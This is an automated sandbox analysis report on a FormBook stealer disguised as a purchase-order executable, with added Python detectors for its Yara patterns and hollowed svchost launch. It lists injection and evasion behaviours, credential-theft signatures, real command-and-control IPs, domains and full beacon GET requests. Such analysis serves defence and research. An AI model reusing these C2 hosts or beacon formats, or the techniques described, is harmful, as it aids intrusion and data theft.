
Windows Analysis Report
Purchase Order TE- 00011-7777.exe

Overview

General Information

Sample name: Purchase Order TE- 00011-7777.exe
Analysis ID: 1510012
MD5: 74e3ad61908355d646036b6b13a20916
SHA1: e6b0b4c0ce1cda9218c81d4453b8101745237149
SHA256: 786448ef89e10b1b440d5c189417acb59a45d5e87e46aa6dc33c015132c46704
Tags: exe

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Purchase Order TE- 00011-7777.exe (PID: 4324 cmdline: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe" MD5: 74E3AD61908355D646036B6B13A20916)
    • svchost.exe (PID: 6188 cmdline: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CjeBlighAyoJst.exe (PID: 1812 cmdline: "C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 4196 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • CjeBlighAyoJst.exe (PID: 4444 cmdline: "C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5792 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x431b2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x2b3b1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
(11 further memory-dump matches are collapsed in the report view)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
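The Windows_Trojan_Formbook_1112e116 matches above are reported as raw byte patterns ($a2, $a3) at offsets inside the dumped regions. The scanner below is an added example written for this page (not Joe Sandbox code and not the Yara rule itself): it searches a memory dump for those two patterns and prints hits in the report's `0x<offset>:$name` form. The rule's full condition is not shown in the report, so the scanner reports per-pattern offsets rather than claiming to reproduce the rule's verdict. The .sdmp stand-in it scans is constructed inline; `scan_dump()` reads a real dump file by path.

```python
from typing import Dict, List

# The two byte patterns listed for rule Windows_Trojan_Formbook_1112e116 in the
# report's Yara tables ($a2 and $a3). Spaces are ignored by bytes.fromhex().
FORMBOOK_PATTERNS: Dict[str, bytes] = {
    "$a2": bytes.fromhex("74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55"),
    "$a3": bytes.fromhex("1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01"),
}


def find_patterns(blob: bytes, patterns: Dict[str, bytes] = FORMBOOK_PATTERNS) -> Dict[str, List[int]]:
    """Return {pattern_name: [offsets...]} for every pattern found in blob (overlapping hits included)."""
    hits: Dict[str, List[int]] = {}
    for name, pattern in patterns.items():
        offsets, start = [], 0
        while (idx := blob.find(pattern, start)) != -1:
            offsets.append(idx)
            start = idx + 1
        if offsets:
            hits[name] = offsets
    return hits


def scan_dump(path: str) -> Dict[str, List[int]]:
    """Scan a memory dump file (e.g. a Joe Sandbox .sdmp region) from disk."""
    with open(path, "rb") as fh:
        return find_patterns(fh.read())


def format_hits(hits: Dict[str, List[int]]) -> List[str]:
    """Render hits the way the report lists them: 0x<offset>:$name."""
    return [f"0x{offset:x}:{name}" for name, offsets in hits.items() for offset in offsets]


def build_sample_dump() -> bytes:
    """Constructed stand-in for a dumped region: NOP filler with both patterns planted at known offsets."""
    buf = bytearray(b"\x90" * 0x400)
    buf[0x40:0x40 + len(FORMBOOK_PATTERNS["$a2"])] = FORMBOOK_PATTERNS["$a2"]
    buf[0x2f0:0x2f0 + len(FORMBOOK_PATTERNS["$a3"])] = FORMBOOK_PATTERNS["$a3"]
    return bytes(buf)


if __name__ == "__main__":
    for line in format_hits(find_patterns(build_sample_dump())):
        print(line)
```

Run against a real region dump with `scan_dump("<path>.sdmp")`; the offsets it returns are relative to the start of the dumped region, which is how the report's offsets (0x2f573, 0x17772 and so on) are expressed as well.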

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ParentImage: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe, ParentProcessId: 4324, ParentProcessName: Purchase Order TE- 00011-7777.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ProcessId: 6188, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ParentImage: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe, ParentProcessId: 4324, ParentProcessName: Purchase Order TE- 00011-7777.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ProcessId: 6188, ProcessName: svchost.exe
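Both Sigma hits fire on the same event: svchost.exe from SysWOW64 is created by the sample on the Desktop, and the child's command line is the parent's own path rather than an svchost invocation, which is what a suspended-process hollowing launch looks like in process-creation telemetry. The check below is an added example (not the Sigma rules themselves) that applies both tests to process-creation events; the first event copies the fields from the report, the second is a constructed benign svchost start. The allow-list of expected svchost parents is a simplified assumption for the example, not the rule's full list.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List

# Parents that normally spawn svchost.exe on Windows 10. Simplified allow-list
# assumed for this example; a production rule carries a longer, maintained one.
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "svchost.exe", "mrt.exe", "ngen.exe", "tiworker.exe"}


@dataclass
class ProcessEvent:
    process_id: int
    image: str          # Image / NewProcessName
    command_line: str   # CommandLine / ProcessCommandLine
    parent_image: str   # ParentImage


def exe_from_command_line(command_line: str) -> str:
    """Lower-cased file name of the executable a Windows command line starts (quoted or bare)."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        exe = command_line[1:].split('"', 1)[0]
    else:
        exe = command_line.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def findings_for(event: ProcessEvent) -> List[str]:
    """Return the reasons that fired for one event (empty list when it looks normal)."""
    reasons: List[str] = []
    image_name = ntpath.basename(event.image).lower()
    parent_name = ntpath.basename(event.parent_image).lower()
    if image_name == "svchost.exe" and parent_name not in EXPECTED_SVCHOST_PARENTS:
        reasons.append(f"svchost.exe started by uncommon parent {parent_name}")
    # Hollowing tell: the process was created from one image but carries another
    # program's command line (in the report, the sample's own path).
    claimed = exe_from_command_line(event.command_line)
    if claimed != image_name:
        reasons.append(f"command line names {claimed} but the image is {image_name}")
    return reasons


def evaluate(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map PID -> reasons for every event that triggered at least one check."""
    result: Dict[int, List[str]] = {}
    for event in events:
        reasons = findings_for(event)
        if reasons:
            result[event.process_id] = reasons
    return result


SAMPLE_EVENTS = [
    # Fields copied from the process-start event in the report (PID 6188).
    ProcessEvent(6188, r"C:\Windows\SysWOW64\svchost.exe",
                 r'"C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"',
                 r"C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"),
    # Constructed benign event: a service host started by the Service Control Manager.
    ProcessEvent(1234, r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
                 r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for pid, reasons in evaluate(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The image/command-line mismatch is the more robust of the two tests: a parent allow-list needs maintenance and can be bypassed by picking a different host binary (the report shows the same chain continuing through RMActivate_ssp.exe), whereas a process whose command line names a different executable than its image has been created suspended and overwritten regardless of which binary was chosen.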
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-12T13:02:39.719355+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 47.57.185.227 | 80 | TCP
2024-09-12T13:03:03.101506+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 89.58.49.1 | 80 | TCP
2024-09-12T13:03:24.935270+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49721 | 154.23.184.240 | 80 | TCP
2024-09-12T13:03:38.544416+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49725 | 85.159.66.93 | 80 | TCP
2024-09-12T13:03:51.946841+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49729 | 185.173.111.76 | 80 | TCP
2024-09-12T13:04:05.250629+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49733 | 203.161.43.228 | 80 | TCP
2024-09-12T13:04:18.731382+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49737 | 161.97.168.245 | 80 | TCP
2024-09-12T13:04:32.719913+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49741 | 172.96.191.39 | 80 | TCP
2024-09-12T13:04:46.013073+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49745 | 104.21.20.125 | 80 | TCP
2024-09-12T13:05:00.602958+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49749 | 43.242.202.169 | 80 | TCP


            AV Detection

Source: Purchase Order TE- 00011-7777.exe | Avira: detected
Source: Purchase Order TE- 00011-7777.exe | ReversingLabs: Detection: 28%
Source: Purchase Order TE- 00011-7777.exe | Virustotal: Detection: 29%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Purchase Order TE- 00011-7777.exe | Joe Sandbox ML: detected
Source: Purchase Order TE- 00011-7777.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CjeBlighAyoJst.exe, 00000003.00000000.2157848345.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318026048.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADFD47 FindFirstFileW,FindClose
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_0013C380 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4x nop then xor eax, eax (4_2_00129B30)
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4x nop then mov ebx, 00000004h (4_2_009404E7)

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49721 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49733 -> 203.161.43.228:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49729 -> 185.173.111.76:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 47.57.185.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49737 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49749 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49725 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49716 -> 89.58.49.1:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49741 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49745 -> 104.21.20.125:80
Source: DNS query: www.golbasi-nakliyat.xyz
Source: DNS query: www.kckartal.xyz
Source: Joe Sandbox View | IP Address: 203.161.43.228
Source: Joe Sandbox View | IP Address: 172.96.191.39
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View | ASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | HTTP traffic detected: GET /w9nd/?nR=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.726075.buzz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.freepicture.online | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.hm62t.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.golbasi-nakliyat.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.mfgamecompany.shop | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
